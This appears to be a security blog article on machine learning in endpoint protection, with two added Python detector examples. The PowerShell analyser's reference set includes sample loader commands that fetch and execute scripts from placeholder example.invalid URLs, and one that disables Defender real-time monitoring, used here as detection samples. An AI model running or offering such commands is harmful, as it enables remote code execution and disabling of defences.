
AI protects against malware

AI ensures that you are always protected against ever-changing online threats. Here, we show you how it works.

December 5, 2023
5 min read
AI dynamically repels threats

For readers in a hurry

  • Modern endpoint protection uses machine learning to detect suspicious behavioral patterns that indicate misuse or malware.
  • This dynamic protection against novel threats complements static protection, which identifies malware based on its known fingerprints (signatures).
  • Machine learning is also used to continuously monitor user behavior, identify attacks based on that behavior, and subsequently remediate their causes and effects.
  • Effective endpoint protection requires self-adapting software that reliably identifies novel threats and initiates appropriate measures.

A tip for trying it out

If you want a good introduction to Large Language Models (LLMs), which are used, among other things, to analyze malware in PowerShell scripts, watch this one-hour video by Andrej Karpathy. It covers almost every aspect of generative AI and LLMs and illustrates them with concrete examples; security is covered as well. A must-watch for every tech-savvy AI enthusiast.

The dynamics of ML

Classic virus scanners and malware detection programs use so-called signature detection: the scanner searches files for byte sequences known to belong to a particular virus and, on a match, quarantines the infected file.

However, this has the disadvantage that the malware must already be known to the scanner. Furthermore, resourceful malware developers can easily modify the signature time and again so that the scanner fails: a game of cat and mouse.

Modern endpoint protection therefore relies on AI mechanisms, specifically machine learning, where the security software observes all program processes and automatically derives patterns from them to detect anomalies. Such anomalies can include:

  • Suspicious Wi-Fi access points
  • New user accounts with high privilege levels
  • Attempts to lower security levels on the PC
  • Data exfiltration attempts to malicious IP addresses
  • Suspicious patterns in network traffic

"Behavioral ML", also known as UEBA (User and Entity Behavior Analytics), goes in the same direction by focusing on user behavior, for example: does a user suddenly try to open files they do not have access to?

If such suspicious behavior is detected, the security software triggers an alert.

The protective hand

Machine learning is also used once a threat, or an actual attack, has occurred. For example, leading endpoint protection software like CrowdStrike not only attempts to detect malware early but also identifies its root cause and provides suggestions for remediation.

Furthermore, AI algorithms are used to track down modified malware signatures that would otherwise go unnoticed. Even malware without a known signature is detected based on its conspicuous behavior, for example when it attempts to bypass security mechanisms.

To avoid reinventing the wheel, CrowdStrike draws on a multitude of sources, which are combined to further train and refine its own ML models. After all, effective protection against malware is a continuous battle against "evil." Standing still regularly leads to problems and defeat in this "battle."

Example: Zero-day exploit

We want to illustrate how AI works at CrowdStrike using an example. For this, we have chosen the dreaded zero-day exploits. There is no remedy for these pests, even once they have been discovered. Only the complete elimination of the vulnerability can solve the problem.

How does CrowdStrike handle this?

  1. A malware author creates new malware and modifies it to bypass signature-based detection. The malware author then publishes the malware on the internet, where their victims encounter it.
  2. Signature-based malware scanners are unable to recognize the new malware because they do not have the malware's signature in their database. However, CrowdStrike's ML models are able to recognize the new malware because they have been trained on a massive dataset of known malware signatures, including signatures that have been modified to bypass conventional signature-based detection.
  3. Furthermore, CrowdStrike's behavioral analysis is able to detect the new malware because it reveals its suspicious behavior, e.g., attempting to access sensitive data or disabling security controls.
  4. Finally, CrowdStrike's threat intelligence can detect the new malware because CrowdStrike collects and analyzes threat data from a variety of sources. CrowdStrike uses this information to update its ML models and detection rules.

In this way, CrowdStrike uses AI/ML in a combination of measures and sources to detect zero-day exploits as reliably as possible, even when they are novel.
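The layered approach described in the two sections above (signature matching for known malware, a behaviour baseline learned from telemetry for novel malware, threat intelligence on top, any layer able to raise the alert), as an added Python example. It is not code from this article or from CrowdStrike. Everything in it is constructed: the byte signature, the telemetry events, the account name and the IP addresses (198.51.100.0/24 and 203.0.113.0/24 are documentation ranges). A small byte-level "modification" of the sample defeats the signature, while the behaviour baseline and the indicator list still produce an alert:

```python
"""Layered malware detection: static signatures, a behaviour baseline learned
from telemetry, and threat intelligence, combined into one verdict.

Added example for this article; not CrowdStrike's code. Every signature,
event, account name and IP address below is constructed.
"""
from collections import Counter
from typing import List, Optional, Tuple

Event = Tuple[str, str]  # (actor, action); actor is a process or a user account

# ---- Layer 1: static protection, a database of known byte sequences -------
SIGNATURES = {
    "Demo.Dropper.A": b"\x4d\x5a\x90\x00DEMO-PAYLOAD-V1",  # constructed pattern
}

def signature_match(sample: bytes) -> Optional[str]:
    """Return the name of the first known byte pattern found in the sample."""
    for name, pattern in SIGNATURES.items():
        if pattern in sample:
            return name
    return None

# ---- Layer 2: dynamic protection, patterns derived from observed behaviour --
class BehaviourBaseline:
    """Learns which (actor, action) pairs are normal and scores new windows."""

    def __init__(self, min_support: int = 2):
        self.counts: Counter = Counter()
        self.min_support = min_support  # how often a pair must be seen to count as normal

    def train(self, events: List[Event]) -> None:
        self.counts.update(events)

    def unseen(self, events: List[Event]) -> List[Event]:
        """Events the baseline has seen fewer than min_support times."""
        return [ev for ev in events if self.counts[ev] < self.min_support]

    def score(self, events: List[Event]) -> float:
        """Fraction of the window that deviates from the learned baseline."""
        return len(self.unseen(events)) / len(events) if events else 0.0

# ---- Layer 3: threat intelligence, indicators shared by external sources ----
KNOWN_BAD_IPS = {"203.0.113.5"}  # constructed indicator list

def threat_intel_hits(events: List[Event]) -> List[Event]:
    """Outbound connections whose destination IP is on the indicator list."""
    return [(actor, action) for actor, action in events
            if action.startswith("connect:") and action.split(":")[1] in KNOWN_BAD_IPS]

# ---- Verdict: any layer can raise the alert ---------------------------------
def evaluate(sample: bytes, window: List[Event], baseline: BehaviourBaseline,
             behaviour_threshold: float = 0.5) -> dict:
    reasons = []
    sig = signature_match(sample)
    if sig:
        reasons.append(f"signature:{sig}")
    score = baseline.score(window)
    if score >= behaviour_threshold:
        reasons.append(f"behaviour:{score:.2f}")
    for _, action in threat_intel_hits(window):
        reasons.append(f"threat-intel:{action}")
    return {"alert": bool(reasons), "reasons": reasons}

# ---- Constructed telemetry --------------------------------------------------
BASELINE_EVENTS: List[Event] = (
    [("winword.exe", "open:docx")] * 5
    + [("winword.exe", "write:docx")] * 3
    + [("chrome.exe", "connect:198.51.100.10:443")] * 4
    + [("user:alice", "open:/finance/reports")] * 6
)
NORMAL_WINDOW: List[Event] = [
    ("winword.exe", "open:docx"),
    ("chrome.exe", "connect:198.51.100.10:443"),
    ("user:alice", "open:/finance/reports"),
]
SUSPICIOUS_WINDOW: List[Event] = [
    ("winword.exe", "open:docx"),                       # normal
    ("winword.exe", "spawn:powershell.exe"),            # never seen in the baseline
    ("powershell.exe", "disable:realtime-protection"),  # attempt to lower the security level
    ("user:alice", "access-denied:/hr/salaries"),       # user probing files she cannot access (UEBA)
    ("powershell.exe", "connect:203.0.113.5:4444"),     # exfiltration attempt to a listed IP
]

ORIGINAL_SAMPLE = b"\x00" * 8 + SIGNATURES["Demo.Dropper.A"] + b"\x00" * 8
MUTATED_SAMPLE = ORIGINAL_SAMPLE.replace(b"V1", b"V2")  # the attacker "modifies the signature"

def trained_baseline() -> BehaviourBaseline:
    baseline = BehaviourBaseline()
    baseline.train(BASELINE_EVENTS)
    return baseline

if __name__ == "__main__":
    b = trained_baseline()
    print("known sample, normal activity   ->", evaluate(ORIGINAL_SAMPLE, NORMAL_WINDOW, b))
    print("mutated sample, normal activity ->", evaluate(MUTATED_SAMPLE, NORMAL_WINDOW, b))
    print("mutated sample, suspicious      ->", evaluate(MUTATED_SAMPLE, SUSPICIOUS_WINDOW, b))
```

The baseline is deliberately simple (a frequency count of actor/action pairs); a production model would learn richer features, but the division of labour is the one the article describes: the signature layer only ever fires on the unmodified sample, while the learned baseline flags the unusual process chain and the user's access-denied burst, and the indicator list independently catches the connection to a listed address.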

Example: PowerShell

PowerShell, which is popular and very powerful on Windows, is also frequently used by attackers to introduce malware into companies. This is where deep learning models come into play: they analyze the attacker's script code and flag it accordingly.

  1. Using Deep Learning models, the most important code segments are automatically extracted from PowerShell scripts.
  2. The AI analyzes the extracted code segments to identify malicious code flows.
  3. The AI compares the code logic with a database of known malicious and benign PowerShell scripts.
  4. If the AI detects malicious code logic, it generates an alert.
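The four analysis steps above, as an added Python example; it is not the article's code or any vendor's, and a token-similarity lookup stands in for the deep learning model. All reference scripts and both test scripts are constructed, and example.invalid is a reserved placeholder domain. String literals and variable names are normalised away before comparison, so a script whose variables and download URL were changed still matches the known reference sample exactly:

```python
"""Static analysis of PowerShell scripts in four steps: segment extraction,
code-flow detection, comparison with a reference database, alert.

Added example for this article, not a vendor's code; a token-similarity
lookup stands in for the deep learning model. All scripts are constructed.
"""
import re
from typing import Dict, List, Set, Tuple

STRING_RE = re.compile(r"'[^']*'|\"[^\"]*\"")
VAR_RE = re.compile(r"\$[A-Za-z_]\w*")
TOKEN_RE = re.compile(r"-?[A-Za-z_][\w-]*")
CMDLET_RE = re.compile(r"^[a-z]+-[a-z]+$")  # Verb-Noun after lowercasing
ALIASES = {"iex": "invoke-expression", "gci": "get-childitem", "iwr": "invoke-webrequest"}

def extract_segments(script: str) -> List[List[str]]:
    """Step 1: split into statements and pipeline stages, replace string literals and
    variable names by placeholders, expand aliases, keep only segments that execute something."""
    cleaned = VAR_RE.sub(" VAR ", STRING_RE.sub(" STR ", script))
    segments = []
    for raw in re.split(r"[;\n|]", cleaned):
        tokens = [ALIASES.get(t.lower(), t.lower()) for t in TOKEN_RE.findall(raw)]
        if any(CMDLET_RE.match(t) for t in tokens) or "(" in raw:  # cmdlet or method call
            segments.append(tokens)
    return segments

def features(segments: List[List[str]]) -> Set[str]:
    """Token unigrams plus in-segment bigrams: a name-independent picture of the code logic."""
    feats: Set[str] = set()
    for seg in segments:
        feats.update(seg)
        feats.update(f"{a} {b}" for a, b in zip(seg, seg[1:]))
    return feats

DOWNLOAD = {"downloadstring", "downloadfile", "invoke-webrequest"}
EXECUTE = {"invoke-expression", "invoke-command"}

def malicious_flows(segments: List[List[str]]) -> List[str]:
    """Step 2: code flows typical of loaders, found without any reference script."""
    flat = {t for seg in segments for t in seg}
    flows = []
    if flat & DOWNLOAD and flat & EXECUTE:
        flows.append("download-and-execute")
    if "-encodedcommand" in flat or "frombase64string" in flat:
        flows.append("encoded-payload")
    if "-disablerealtimemonitoring" in flat:
        flows.append("security-control-disabled")
    return flows

def jaccard(a: Set[str], b: Set[str]) -> float:
    return len(a & b) / len(a | b) if a | b else 0.0

# Step 3 input: a small constructed database of labelled scripts.
REFERENCE_DB: List[Tuple[str, str]] = [
    ("benign", "Get-ChildItem C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Remove-Item"),
    ("benign", "Get-Service | Where-Object { $_.Status -eq 'Stopped' } | Export-Csv 'services.csv'"),
    ("benign", "Import-Module ActiveDirectory; Get-ADUser -Filter * | Select-Object Name | Export-Csv 'users.csv'"),
    ("malicious", "$c = New-Object Net.WebClient; $p = $c.DownloadString('https://example.invalid/a'); Invoke-Expression $p"),
    ("malicious", "Set-MpPreference -DisableRealtimeMonitoring $true; IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/b')"),
]

def analyse(script: str, db=REFERENCE_DB, threshold: float = 0.5) -> Dict:
    """Steps 3 and 4: nearest reference script by Jaccard similarity, then the alert decision."""
    segments = extract_segments(script)
    feats = features(segments)
    flows = malicious_flows(segments)
    nearest, best = "none", 0.0
    for label, ref in db:
        sim = jaccard(feats, features(extract_segments(ref)))
        if sim > best:
            nearest, best = label, sim
    alert = bool(flows) or (nearest == "malicious" and best >= threshold)
    return {"alert": alert, "flows": flows, "nearest": nearest, "similarity": round(best, 3)}

# Constructed test inputs: the first is the known loader with renamed variables and a
# different URL, the second is routine housekeeping.
SUSPECT = "$w = New-Object Net.WebClient; $s = $w.DownloadString('https://example.invalid/stage2'); iex $s"
CLEAN = "Get-ChildItem D:\\Backups -Filter *.bak | Where-Object { $_.Length -gt 10MB } | Remove-Item"

if __name__ == "__main__":
    print(analyse(SUSPECT))
    print(analyse(CLEAN))
```

The flow rules in step 2 fire on their own, so a loader that resembles nothing in the database is still flagged; the database comparison in step 3 adds the second signal the article describes, and the normalisation in step 1 is what makes a renamed or re-hosted copy of a known script land on the same feature set.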

Without artificial intelligence, it will be difficult to keep internet-borne threats at bay. For this reason, an understanding of how the security software used in your own company works is essential.

Those who ask the right questions have a clear advantage.
